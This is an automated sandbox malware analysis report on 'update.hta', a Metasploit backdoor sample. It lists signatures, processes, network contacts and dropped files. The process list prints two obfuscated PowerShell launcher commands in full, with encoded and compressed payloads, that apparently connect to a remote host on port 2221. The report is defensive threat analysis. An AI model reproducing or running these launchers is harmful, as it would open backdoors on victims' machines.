Malware Analysis Report

2024-09-23 04:05

Sample ID 240619-1t7m1atcrc
Target update.hta
SHA256 3e32fa64ce2ccb3e071423c424ac845cb162cb2b749de4084220f4f9155317b6
Tags
metasploit backdoor execution trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

3e32fa64ce2ccb3e071423c424ac845cb162cb2b749de4084220f4f9155317b6

Threat Level: Known bad

The file update.hta was found to be: Known bad.

Malicious Activity Summary

metasploit backdoor execution trojan

MetaSploit

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-19 21:57

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-19 21:57

Reported

2024-06-19 22:07

Platform

win11-20240508-en

Max time kernel

489s

Max time network

498s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\update.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

Signatures

MetaSploit

trojan backdoor metasploit

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\update.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEASwBYAEwANABXAFUAQwBBADcAVgBXACsAMgAvAGEAUwBCAEQAKwB2AFYATAAvAEIANgB0AEMAcwBxADAAUwBiAEIANQB0AEgAbABLAGwAVwB4AHMATQB0AEkARgBBAEgATgA1AEYAMQBjAFoAZQA3AEEAMQByAEwANwB7ADIAfQBYAEUATgBMAHIALwAzADYAewAxAH0AQgB1AGQAeABTAGEAcgBjAFMAYgBWAEUAcwBvACsAWgAyAGQAbAB2AHYAcABuAFoAeABUAHIAMgBCAE8AVwB4AGMAbABWADIAbABaAC8AdgAzACcAJwArACcAJwB5AG4ANwByADQAYwBUAEgAQwBsAGEASQBUAHcAcQBLAG8AVgBsAGUAbgBpAHMAUAArAHcAVgAvAEkAYgB5AFIAZABGAG0AYQBMAFcAcQA4AHcAagBUAGUASAA1AHkAWQBxACsAVABoAE0AUgBpAE4AeQA4ADEAaQBVAEIAcABTAHEASgBMAFIAawBtACcAJwArACcAJwBxADYAYwByAGYAeQBpAGcAawBDAFQAJwAnACsAJwAnAGsANAB1ADcAdwBpAG4AbABCACsASwBvAFUAJwAnACsAJwAnAGYAcABTAGIAagBsADUAagB0AHgAYgBZADIAOQBrAEsAaQBIAEsARABZAGwAMwB1AG4AMwBNAFAAUwBxADUASwA3AFkAbABSAG8ANgB2AGYAdgBxAGoANAA3AEsATQA5AEwAagBlAHMAMQBaAHEAbQBtAHUAdAB0AFUAawBLAGoAawBNADYAYgBxAHkAaQA5AGQASABuAGkAeABYAFIARgBOADcAVgBBAHYANABTAGwAZgBpAE4ASwBJAHgAdABWAEsAYQBSAEMAbgBlAEUAewAyAH0ANgBZAE8AMgB7ADIAfQBkAEkAZwBJAHUAWgArAHEAYwBKAFcASAB5AHkAUgBFAHIASgBOAFkAMwBrAGsAYQAyAFkAbABvAEsAZwB4ADcAQwBmAGUAUQA3AHkAYwBrAFQAZABXAGkATQBwAFAAbQBaAC8AUAA1AFgAOQBwAHMAZgAvAGIANQBPAGgAWQAwAEkAcQBWADIATABFAGoAQwBWAHkANQBKAGIAcQBoAEgAMABsAEkATAB4AHsAMQB9ADQAagA1ADIAUQB4AEIAeQAxAFgASgBEAFEATwA1AHIAbwBPAFkAagBkADgAUwBiAFIAQwB2AHsAMgB9AGEAcwBxAFAAdwBYAE0AMQBxAFgAYgBIAEwAawAzAHEAcQBrAFAAVgBZAEMAcQBaADUASQA5AEMASwBFADgAOQBrAHQATwA5AHgAZgBNADcATABUAFUAMQA5AHcARQB3AGkAZwB3ADUAZQBUAEEASwBEADcASgBkAEYAYgA1AEwAUQBoAHsAMQB9AGcAdQBzAGUAVgBqAEkAdgAxAG0AMgBRADgAQgBiAHIAYwBkAFQAbQBxAGwAKwBVAGMAeQBpACcAJwArACcAJwAwAG8AewAyAH0AVABzAGUARABKAEYAcQBhAEYAaQAyAFIATgA5AFAAawA5ADEAawBvAGgAYgBwAFoASgA4AGEAMwBXAHkAcgBrAHEASwBQAHEAZgBZAHsAMgB9AEUAMgA1AE4AUwBmAFAANgBnAC8AJwAnACsAJwAnAGkAWAB0AGgAZQAzAHMAWABTAGEASABYAFcAVgB3AG4AQwB4AHEAVAArAGoAYgB7ADIAfQBFAGYAVgB5AG8AbQBvAHYAaABZAE0AcwB7ADIAfQBNAG4AdwBLAE8AVgBpAFgAZgBCAFAAVQAvAGMAYgB4AEsAOABUAFIAZwBJAHMASgBNAFMAUwBGAGMALwBVAHsAMgB9AGgARQBWADkANwByAFcAbQBqAEsAZgBKAE0AaQBEAGsASwBiAGcARgBVAFIAYgBmACsAcgBNAEwAbQBxAGEAMgBvADQANwBKAEEATAB3AGQAbgBPAGcAYQBXAEUAQgA2AFUARgB5ADYAWAAxAEsAYgBQAFAAVAA1AFIAeQBFAFYASgB2AGgATgBDADAAcQB2AFQAWABrAHAAMQBkAFUAWABJAEkAWgA4AFkAcwBLAGkAbABPADYAMwAwAEoAcgB3AGIATwBoACsAdQBCAHUAWgA4ADAARQA5AFgAQQBxAGMAbgBOAHsAMQB9AC8AVgA5AHcANwBvACsAMQBlAFoAeQBLAFoATwAxAEIAVwBBAHsAMgB9AEMAQwAzAGQARgBQAEkAcQBaAFIASwBTAG8AdABLAGgAUAByAEsAMQBMAGcALwB4ADQAOQBVAFUAOABiAE0AdwBZAEoAQQA1AFkAdQBvAEYANAB3AEkAcgBFAHcAUgBXAFMATABBAGwANABtAGgARgBEAEwANwBsAEUAdABLAE0AVgBJAHgASABJAFoAUABYAEMAWQBUAGkAQQA2AHIAQgBQAGoAJwAnACsAJwAnADQAeABkAE8AQwBDACsAKwBvAHEAagBlAFIANwBzAFMAQwArAFIAeQBTAEYANQA1AEMAYQBFADIAMgBWAGMARgBKAFUAaABUAFEAUgBVAEgANABtAHkALwArAGwALwArAGYAQwA4ADYAbQBUAE8AMgBBAG4AWgBCADAAZgBMADgAMgB0AG0AYgBZAFYATQBnAFkASQBYADMALwA1AG8AUwBaAHIAdQBNAGMAbwBRAFMAUQBTAGcANABTAFEAOABzAG4AQgBLAFAAdABkADIAUgBVAGIANwBZAEoAewAxAH0AUgBIAG8ASgAnACcAKwAnACcAdgBVAG0AKwA1AGwAQQB5AFgAdABOAHsAMQB9AGUAdwBLADgARAB2ADAARgBuAGMAZABRAFQASgBvADkAbwB0AGMAMAA3AG4AcAAzADIAbQBzADQAUgBvAHAAdABnADQAeAAxADEAawBlAGQALwA5AGMAbQB4AE8ANgB3ACcAJwArACcAJwBKAHQAOQBFAFcAZABnACsAMQArAHQAJwAnACsAJwAnAFMAMABhAHEARgBuAG0AUgBmAFoATwBKAGoAUQBjAGgAQQBnAHYAOQBzAFAAUABXAGIAMgA2AGkAMwBEAG4AYQBRAG0AMwBiAFIAewAyAH0ASABhADkAdQAzAFcAMABxAEsAWgBDADEAVgBtAHUATgAnACcAKwAnACcAVABWAFMAdAAxAHMANgBxADUAaABMAGcAawB7ADEAfQBwAEwAMABJAG4AbwA1AHYAWQBVAHgAbABCACcAJwArACcAJwBOAHsAMQB9ADAANgB0AGQAbQBxAFoAYgBkAGIANABhAHAAJwAnACsAJwAnADkAZgBqAGkAcgBPAGQATQBSAGEAUgBzADAASgBGAHkATwBlAHUAcAA4AG4AZABjAE0AdwBqAG4AMQBjADcAMgB3AFIAcwByAGgAZgA3AFcAewAxAH0ASAA1AFgATgArADAAZgBJAGkAcQB4AFoAewAxAH0ANAA5AGkAdQBMAFYARQBEAEkAVAB0AHUARABCADIATABmADUAdABZAEMAZQBvAFoAUQB4AHkAcwArAEgAaQAxAGEAUgA5AFYAQQBoAHMAaABLAEEAZABrADIAaAA4ADQAVgByAC8AdgBXAHsAMgB9AGoAUQB2AEwAcQB1AEgAeAB1AEIAJwAnACsAJwAnAGMAVAB3AGEANAA5AEEAYQBEAFMAdAAwAHUAaABxAGYAaAB7ADEAfQBCADMATgBxADMAKwBOADgATwBzAHQAWAAxAHkAeAA2AGMAYgBBAEsANwBKAEUAUQA3AE8AUQBTAGEAdwBLADEANgA0AEEASgBuADYAUgAyAFIAOQA3AFAASwAwAGcAcABjAFcAUgAnACcAKwAnACcAeABiAEkATwBOAE4AcgAxAEEAdwBuAEsANgBmAEgAWQBQADkAaQBVAE8ARgBvAHkATABwAGoAagBFADYAbgBXADgAYwB3AHkAcABOAGUARABiAFYATQBQAG0AbwB7ADIAfQBxAEEALwBpAE8ATABEADYAewAyAH0ASwBVADMAOQBiAHUANgBVAFIANwA2ADMAQgA5ADkANgBrADQAVwB4AG4ARABNAEQAbwAyADYAMwBlACsARgBZADMAbABuAFkAeABYAEoAdgA1AHQAVwAvAFoAcwAzAEwAVwArADgAcwA4AE8AagAwAHgARQBkAFIAaAB3AE4ARAB7ADIAfQBQADQAQQBWAGcAeAB7ADIAfQA5AEIAWQBWACcAJwArACcAJwBDAHYAewAxAH0AdwB1AHAAUQBGAHMANwAzADcAdwBxAGgAKwA0AGcAVwByAHsAMQB9AFcARQBEAGsANwBTAEUARABPAGcAQwA5AFQANgBQAHsAMgB9ADgAZABuAGoAagA3ACsAdAAzAGoAVgB7ADIAfQBwAG8AbQBtAHsAMQB9AC8AUwA1AEwARQBoAEUASABUAGgATABhAGEAcwB4ADAAeAB4AGoAMwBaAE8AcQBEAFEAUQA5AFAAYQB0AFIATABaADIAUQBiAHQAewAxAH0ASgArAFgAUgByAHAAeQBMADYAZwAvAHQASgBSADgANgBlAFIAawBDAGkANQBDAC8AbQBUAFUATABwADIAUwBPAEIAQgBoADAAYgB5AHQAbQBpAGIAMABBAC8AUABXAHIAewAyAH0AVwBaADgAdgBhAGIAMgBYAHkAMQAxAFgAYgBXAGkAJwAnACsAJwAnAHIASwBsAEEARABMADMAMQBsAGwAbQBIAFEAewAxAH0AUwBoAGEASgBwAGYAeAB3AHQAZQBEAE0ASQBxAHsAMgB9AEMAdgA0AGYAVQBhAGQASABEAHcARQBzAG8ATgAxAEwAOQBkAEUAJwAnACsAJwAnAFoAQQBBACcAJwArACcAJwBXAHAAeQB7ADEAfQB4AC8AQgBsACcAJwArACcAJwB0ADcAcABuAHcAUgBQAHMAQQBMAFEAeQAzAEgAcwBtAEgAdwB2AEEARAAxAEEALwBJAE4AZABLAFEAYwBoAHUAKwByAGcANwBGADgAVABGAFYAZQBPAFAAawBtAFoAZgB5AFUATAA0ADUALwArAGUATgBBADkAcgB2ADkAbAA5AEUANQBIAE0AbwBvAFQAbQAyAGUATABUAGgAVQBjAE4ANABNAC8AZABmAG8AUwBwAEEARQBFAFgAaQBqAEUAagB1AHgAZgBDAFMAeQBEAHMAawArAFIAUgBhAHsAMgB9AFYAYwBJAEEATQBXACsAMAArACsAbAA4AC8AVwA0AHEAQQBMAGIANwBDAHMASAAvAHcARABpAFAAVwBoAFkAcQBVAEwAQQBBAEEAewAwAH0AJwAnACkALQBmACcAJwA9ACcAJwAsACcAJwB6ACcAJwAsACcAJwBHACcAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAKXL4WUCA7VW+2/aSBD+vVL/B6tCsq0SbB5tHlKlWxsMtIFAHN5F1cZe7A1rL7{2}XENLr/36{1}BudxSarcSbVEso+Z2dlvvpnZxTr2BOWxclV2lZ/v3'+'yn7r4cTHClaITwqKoVlenisP+wV/IbyRdFmaLWq8wjTeH5yYq+ThMRiNy81iUBpSqJLRkm'+'q6crfyigkCT'+'k4u7winlB+KoU'+'fpSbjl5jtxbY29kKiHKDYl3un3MPSq5K7YlRo6vfvqj47KM9Ljes1ZqmmuttUkKjkM6bqyi9dHnixXRFN7VAv4SlfiNKIxtVKaRCneE{2}6YO2{2}dIgIuZ+qcJWHyyRErJNY3kka2YloKgx7CfeQ7yckTdWiMpPmZ/P5X9psf/b5OhY0IqV2LEjCVy5JbqhH0lILx{1}4j52QxBy1XJDQO5roOYjd8SbRCv{2}asqPwXM1qXbHLk3qqkPVYCqZ5I9CKE89ktO9xfM7LTU19wEwigw5eTAKD7JdFb5LQh{1}guseVjIv1m2Q8BbrcdTmql+Ucyi'+'0o{2}TseDJFqaFi2RN9Pk91kohbpZJ8a3WyrkqKPqfY{2}E25NSfP6g/'+'iXthe3sXSaHXWVwnCxqT+jb{2}EfVyomovhYMs{2}MnwKOViXfBPU/cbxK8TRgIsJMSSFc/U{2}hEV97rWmjKfJMiDkKbgFURbf+rMLmqa2o47JALwdnOgaWEB6UFy6X1KbPPT5RyEVJvhNC0qvTXkp1dUXIIZ8YsKilO630JrwbOh+uBuZ80E9XAqcnN{1}/V9w7o+1eZyKZO1BWA{2}CC3dFPIqZRKSotKhPrK1Lg/x49UU8bMwYJA5YuoF4wIrEwRWSLAl4mhFDL7lEtKMVIxHIZPXCYTiA6rBPj'+'4xdOCC++oqjeR7sSC+RySF55CaE22VcFJUhTQRUH4my/+l/+fC86mTO2AnZB0fL82tmbYVMgYIX3/5oSZruMcoQSQSg4SQ8snBKPtd2RUb7YJ{1}RHoJ'+'vUm+5lAyXtN{1}ewK8Dv0FncdQTJo9otc07np32ms4Roptg4x11ked/9cmxO6w'+'Jt9EWdg+1+t'+'S0aqFnmRfZOJjQchAgv9sPPWb26i3DnaQm3bR{2}Ha9u3W0qKZC1VmuN'+'TVSt1s6q5hLgk{1}pL0Ino5vYUxlB'+'N{1}06tdmqZbdb4ap'+'9fjirOdMRaRs0JFyOeup8ndcMwjn1c72wRsrhf7W{1}H5XN+0fIiqxZ{1}49iuLVEDITtuDB2Lf5tYCeoZQxys+Hi1aR9VAhshKAdk2h84Vr/vW{2}jQvLquHxuB'+'cTwa49AaDSt0uhqfh{1}B3Nq3+N8OstX1yx6cbAK7JEQ7OQSawK164AJn6R2R97PK0gpcWR'+'xbIONNr1AwnK6fHYP9iUOFoyLpjjE6nW8cwypNeDbVMPmo{2}qA/iOLD6{2}KU39bu6UR763B996k4WxnDMDo263e+FY3lnYxXJv5tW/Zs3LW+8s8Oj0xEdRhwND{2}P4AVgx{2}9BYV'+'Cv{1}wupQFs737wqh+4gWr{1}WEDk7SEDOgC9T6P{2}8dnjj7+t3jV{2}pomm{1}/S5LEhEHThLaasx0xxj3ZOqDQQ9PatRLZ2Qbt{1}J+XRrpyL6g/tJR86eRkCi5C/mTULp2SOBBh0bytmib0A/PWr{2}WZ8vab2Xy11XbWi'+'rKlADL31llmHQ{1}ShaJpfxwteDMIq{2}Cv4fUadHDwEsoN1L9dE'+'ZAA'+'Wpy{1}x/Bl'+'t7pnwRPsALQy3HsmHwvAD1A/INdKQchu+rg7F8TFVeOPkmZfyUL45/+eNA9rv9l9E5HMooTm2eLThUcN4M/dfoSpAEEXijEjuxfCSyDsk+RRa{2}VcIAMW+0++l8/W4qALb7CsH/wDiPWhYqULAAA{0}')-f'=','z','G')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))

Network

Country Destination Domain Proto
TR 94.156.8.243:2221 tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

memory/4508-0-0x000000007139E000-0x000000007139F000-memory.dmp

memory/4508-1-0x0000000003130000-0x0000000003166000-memory.dmp

memory/4508-2-0x0000000005B40000-0x000000000616A000-memory.dmp

memory/4508-3-0x0000000071390000-0x0000000071B41000-memory.dmp

memory/4508-4-0x0000000005880000-0x00000000058A2000-memory.dmp

memory/4508-5-0x0000000071390000-0x0000000071B41000-memory.dmp

memory/4508-7-0x0000000005A50000-0x0000000005AB6000-memory.dmp

memory/4508-6-0x00000000059E0000-0x0000000005A46000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_id02vxib.51c.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4508-16-0x0000000006170000-0x00000000064C7000-memory.dmp

memory/4508-17-0x00000000065E0000-0x00000000065FE000-memory.dmp

memory/4508-18-0x0000000006690000-0x00000000066DC000-memory.dmp

memory/4508-19-0x0000000007F30000-0x00000000085AA000-memory.dmp

memory/4508-20-0x0000000006B30000-0x0000000006B4A000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 c0636f2d138baca01dbb2eedb99bf3d5
SHA1 3b927899db0f3e2cb510782592887dc02fc3e400
SHA256 10973e727e5b0eb3f12aba60a682d66e79dfd86e4b6cfc454fd8df70c6e1fa8a
SHA512 0187a6ccb6428fb24ad4bc4ca14e7ce6f40ae6ca4f352f8e86a15288deb05cb4dd317ef8e9d04dc9ffb24407ecf0924af2c7910830c79366f7e4e48cb4b82b1d

memory/4508-24-0x0000000071390000-0x0000000071B41000-memory.dmp

memory/4004-25-0x0000000005A20000-0x0000000005D77000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d8fa24363a7d3592d0f6c4c6bf17da4c
SHA1 90df2df5d34d62640c3b24a5b09f305ba00c8359
SHA256 3e66e0f73a2d6e01ed51ca1ab4fae77b881cbe8e17583e5c1db7a6b6102e6230
SHA512 5f51c66e72cde65315eccdf10df0f269ae6c648322780445dd5153fa46020a76e1fcb3b5b53a9ef88b252e0d0e2966a5c4dfb77fd46d810a6615fc76bba38ab3

memory/4004-35-0x00000000064B0000-0x00000000064FC000-memory.dmp

memory/4004-36-0x0000000005D90000-0x0000000005D91000-memory.dmp